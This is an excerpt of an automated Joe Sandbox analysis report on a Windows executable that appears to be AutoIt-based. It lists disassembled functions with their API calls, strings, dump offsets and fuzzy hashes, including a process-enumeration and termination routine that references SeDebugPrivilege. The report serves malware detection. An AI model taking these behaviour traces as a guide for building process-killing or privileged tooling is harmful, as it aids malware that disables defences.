                                                          • Instruction ID: 8fe591f3b96b1f3d35bd9b68ac9996eb826ab8b73c20a242eacc0d0a2beaa629
                                                          • Opcode Fuzzy Hash: ce3138df1024fa88f72e218b420affa46d8da176aa91461c46ec13927babcfd9
                                                          • Instruction Fuzzy Hash: 6701A8B5640348FFE610ABA5DC89F6F3BACEB89711F418425FA05DF1A1CA709801CA20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 11231f851406dbd53b2c0778f763cb87fe4a20cfa1e988ab5d1fceb543f71552
                                                          • Instruction ID: 6df668e10fc7473d941a0b096f8f63f569f8d091d6ada8db049f4171351c6c60
                                                          • Opcode Fuzzy Hash: 11231f851406dbd53b2c0778f763cb87fe4a20cfa1e988ab5d1fceb543f71552
                                                          • Instruction Fuzzy Hash: 43C19475A00219AFDF10DF98D884BAEB7F5FB88314F14856AEA15A7380E7709E45CB50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-625585964
                                                          • Opcode ID: eee187d60c56558f5c01f9fc1690e0222e67bc51f86ff49b11c22e6918bc73f4
                                                          • Instruction ID: c9070589d38a0b7f30177742afdc8400685c444c8fea9ffde05b2c7d34e5ceb6
                                                          • Opcode Fuzzy Hash: eee187d60c56558f5c01f9fc1690e0222e67bc51f86ff49b11c22e6918bc73f4
                                                          • Instruction Fuzzy Hash: 5E919175A00215ABDF24DFA5C888FAEBBB8EF45714F10811AF615AB290D7709A45CFA0
                                                          APIs
                                                            • Part of subcall function 00CB710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?,?,00CB7455), ref: 00CB7127
                                                            • Part of subcall function 00CB710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7142
                                                            • Part of subcall function 00CB710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7150
                                                            • Part of subcall function 00CB710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?), ref: 00CB7160
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CD9806
                                                          • _memset.LIBCMT ref: 00CD9813
                                                          • _memset.LIBCMT ref: 00CD9956
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00CD9982
                                                          • CoTaskMemFree.OLE32(?), ref: 00CD998D
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 00CD99DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: 15816f3e1f9613f81e4957bd0952fd161d94118e3fb7495098f1bba5a4bb7e20
                                                          • Instruction ID: f0a387970e56f43e65fcbe91f8e77a4b9d07d33597a16cf4192a57e28190b55c
                                                          • Opcode Fuzzy Hash: 15816f3e1f9613f81e4957bd0952fd161d94118e3fb7495098f1bba5a4bb7e20
                                                          • Instruction Fuzzy Hash: 2F914871D00229EBDB20DFA5DC84EDEBBB9EF08310F20415AF519A7291DB719A44DFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CE6E24
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CE6E38
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CE6E52
                                                          • _wcscat.LIBCMT ref: 00CE6EAD
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CE6EC4
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CE6EF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: a7c8e6fc2822fa58d1a83476d3af25589bf992a049546ec9c4f4e484a251d2c9
                                                          • Instruction ID: 0fb704466c12812f9f8804c02dbcff48e9d0678b60879feaf6a6c783c8161233
                                                          • Opcode Fuzzy Hash: a7c8e6fc2822fa58d1a83476d3af25589bf992a049546ec9c4f4e484a251d2c9
                                                          • Instruction Fuzzy Hash: 5041B271A00388AFDB219F65CC85BEEB7F9EF18790F10042AF594E72D1D6719E858B60
                                                          APIs
                                                            • Part of subcall function 00CC3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00CC3C7A
                                                            • Part of subcall function 00CC3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00CC3C88
                                                            • Part of subcall function 00CC3C55: CloseHandle.KERNEL32(00000000), ref: 00CC3D52
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDE9A4
                                                          • GetLastError.KERNEL32 ref: 00CDE9B7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDE9E6
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CDEA63
                                                          • GetLastError.KERNEL32(00000000), ref: 00CDEA6E
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CDEAA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: b15c3dd50f706e5ef5b33f558c5e6373e21b91643b41bcd108569e7d6bd2e7f7
                                                          • Instruction ID: e7185aa07c8030e7546ca22a5a8c7b3c09121cf272f8bcae9f9b29427b81c697
                                                          • Opcode Fuzzy Hash: b15c3dd50f706e5ef5b33f558c5e6373e21b91643b41bcd108569e7d6bd2e7f7
                                                          • Instruction Fuzzy Hash: D44177712002019FDB24EF14CCA5BAEBBA5AF44314F048419FA469F3D2CB74A909EB91
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00CC3033
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 45718a608810668a7f9ff4ee90354795b1ae41c3698c5eacffc25d6f0dcab460
                                                          • Instruction ID: 969b4f6e38d04a223a9cdbfd435ce71406de5e7da32f0f17514927ef83710f84
                                                          • Opcode Fuzzy Hash: 45718a608810668a7f9ff4ee90354795b1ae41c3698c5eacffc25d6f0dcab460
                                                          • Instruction Fuzzy Hash: C4112B327483C6BEE7249A55FC82EAB7B9CDF15324B20406EF900AA1C1DF705F4466B8
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CC4312
                                                          • LoadStringW.USER32(00000000), ref: 00CC4319
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CC432F
                                                          • LoadStringW.USER32(00000000), ref: 00CC4336
                                                          • _wprintf.LIBCMT ref: 00CC435C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CC437A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00CC4357
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: d155d45094fd2f63c2cd5cb540e105eee241fed4661e07a2c4c70d108671c1da
                                                          • Instruction ID: cefa2557d2c09f44305e639b554f11559df945555ae698fda987545f40148a13
                                                          • Opcode Fuzzy Hash: d155d45094fd2f63c2cd5cb540e105eee241fed4661e07a2c4c70d108671c1da
                                                          • Instruction Fuzzy Hash: DA014FF2900248BFE711A7A0DD89FEA776CEB08700F0045A9BB45E6051EA749E864B74
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • GetSystemMetrics.USER32(0000000F), ref: 00CED47C
                                                          • GetSystemMetrics.USER32(0000000F), ref: 00CED49C
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CED6D7
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CED6F5
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CED716
                                                          • ShowWindow.USER32(00000003,00000000), ref: 00CED735
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CED75A
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CED77D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 9ea40798d011478cfb84d22c0fd43acb5833b006194f164f278c8b6e50a0a2b8
                                                          • Instruction ID: a9eed20a0a4e2c0d7108bd4984d2ed5f28c0cbc465407e1f6844a65f8ee0ff23
                                                          • Opcode Fuzzy Hash: 9ea40798d011478cfb84d22c0fd43acb5833b006194f164f278c8b6e50a0a2b8
                                                          • Instruction Fuzzy Hash: 79B18B75500295EBDF14CF6AC9C57AD7BB1BF04701F048069FC5A9F299D734AA90CB60
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000), ref: 00C62ACF
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C62B17
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000), ref: 00C9C21A
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000), ref: 00C9C286
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 9ea4ffd1343bda85ab73d2ae19639846f8c90cac6fac66f41bb6c906a1bdd6d6
                                                          • Instruction ID: 952772db6c1148ee60fb61e90d2fd711f68278a620eae1171166ee39a99433b7
                                                          • Opcode Fuzzy Hash: 9ea4ffd1343bda85ab73d2ae19639846f8c90cac6fac66f41bb6c906a1bdd6d6
                                                          • Instruction Fuzzy Hash: EA41EB31608FC09BDB359B699CCCB7B7B95AB85310F14891DF0A786562C6B19A43F720
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CC70DD
                                                            • Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
                                                            • Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CC7114
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00CC7130
                                                          • _memmove.LIBCMT ref: 00CC717E
                                                          • _memmove.LIBCMT ref: 00CC719B
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00CC71AA
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CC71BF
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CC71DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: 8c67f2ad687c1f94365f11a79b180b88438772263ea1a86a3206b86cc253d9b7
                                                          • Instruction ID: 877490f2aa49fc55091f0f68b29ab3bf5982655a64997b7f3dbb209b7c656ebf
                                                          • Opcode Fuzzy Hash: 8c67f2ad687c1f94365f11a79b180b88438772263ea1a86a3206b86cc253d9b7
                                                          • Instruction Fuzzy Hash: 31315B31900205EBCF40EFA4DC85AAFB7B8EF45710F2481A9F904AB256DB309E15DBA4
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00CE61EB
                                                          • GetDC.USER32(00000000), ref: 00CE61F3
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CE61FE
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00CE620A
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CE6246
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CE6257
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CE902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00CE6291
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CE62B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 4e7d0e3f886a5763725031ce0738ac187c158614644fc323cb2424c6586c0685
                                                          • Instruction ID: 5f5ac5716de660f6a766ba229143f19bf5e80390b78fda76a2a44bfd23bf1e9a
                                                          • Opcode Fuzzy Hash: 4e7d0e3f886a5763725031ce0738ac187c158614644fc323cb2424c6586c0685
                                                          • Instruction Fuzzy Hash: F6316B72201254BFEF118F61CC8AFEA3BADEF59765F044069FE089E291C6759D42CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 8c6c8e13b9c39e137716d1ce01c16c1a9f28b8f8fabf2de0a4b488dc4ea2ffff
                                                          • Instruction ID: 9e15d53d244c3ce9a4b389724148caa18d763e7cc42ce1edc0a8de6d3e687e1b
                                                          • Opcode Fuzzy Hash: 8c6c8e13b9c39e137716d1ce01c16c1a9f28b8f8fabf2de0a4b488dc4ea2ffff
                                                          • Instruction Fuzzy Hash: 1A21D5726026297BE604B7129D42FFF7B9D9E5038CF084020FE0596747EBA4DF12D2A6
                                                          APIs
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                            • Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9
                                                          • _wcstok.LIBCMT ref: 00CCEC94
                                                          • _wcscpy.LIBCMT ref: 00CCED23
                                                          • _memset.LIBCMT ref: 00CCED56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 7b8845d3c5c049368ac9c4896eb543f18f413be60bae0fde8c68308451695c80
                                                          • Instruction ID: cfc466ae3071909c1b04b914d720fee8c67d95aa3fc53a69fcac06887e3673b2
                                                          • Opcode Fuzzy Hash: 7b8845d3c5c049368ac9c4896eb543f18f413be60bae0fde8c68308451695c80
                                                          • Instruction Fuzzy Hash: 1CC18A716083419FC764EF64C881E6AB7E4FF85314F10492DF89A9B2A2DB30ED45DB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 10977a263c0454e52a0ea5ba039d1a8b7f840311ea368d955d260bca231e3372
                                                          • Instruction ID: 2d8905e7a2e5101d0e40a2ea57a02660be6a883adbbc0d783f11866d948329d1
                                                          • Opcode Fuzzy Hash: 10977a263c0454e52a0ea5ba039d1a8b7f840311ea368d955d260bca231e3372
                                                          • Instruction Fuzzy Hash: 38716C30900109FFDB24CF99CC89ABEBBB9FF85311F188159F915AB251C734AA51DBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e342951b76ffb766265591deccbd85177c6cfea529ff3e7b79cf6326bf1c5785
                                                          • Instruction ID: a99ea2f63c5a5f4aaa92a9840411264e58b61cad538ae336d4a4ec691adf715b
                                                          • Opcode Fuzzy Hash: e342951b76ffb766265591deccbd85177c6cfea529ff3e7b79cf6326bf1c5785
                                                          • Instruction Fuzzy Hash: 4861AF71208300ABC720EB64DC81F6FB7E9EF94714F104A1EF6559B292DB70AD05DB52
                                                          APIs
                                                          • IsWindow.USER32(00F96388), ref: 00CEB3EB
                                                          • IsWindowEnabled.USER32(00F96388), ref: 00CEB3F7
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CEB4DB
                                                          • SendMessageW.USER32(00F96388,000000B0,?,?), ref: 00CEB512
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00CEB54F
                                                          • GetWindowLongW.USER32(00F96388,000000EC), ref: 00CEB571
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CEB589
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
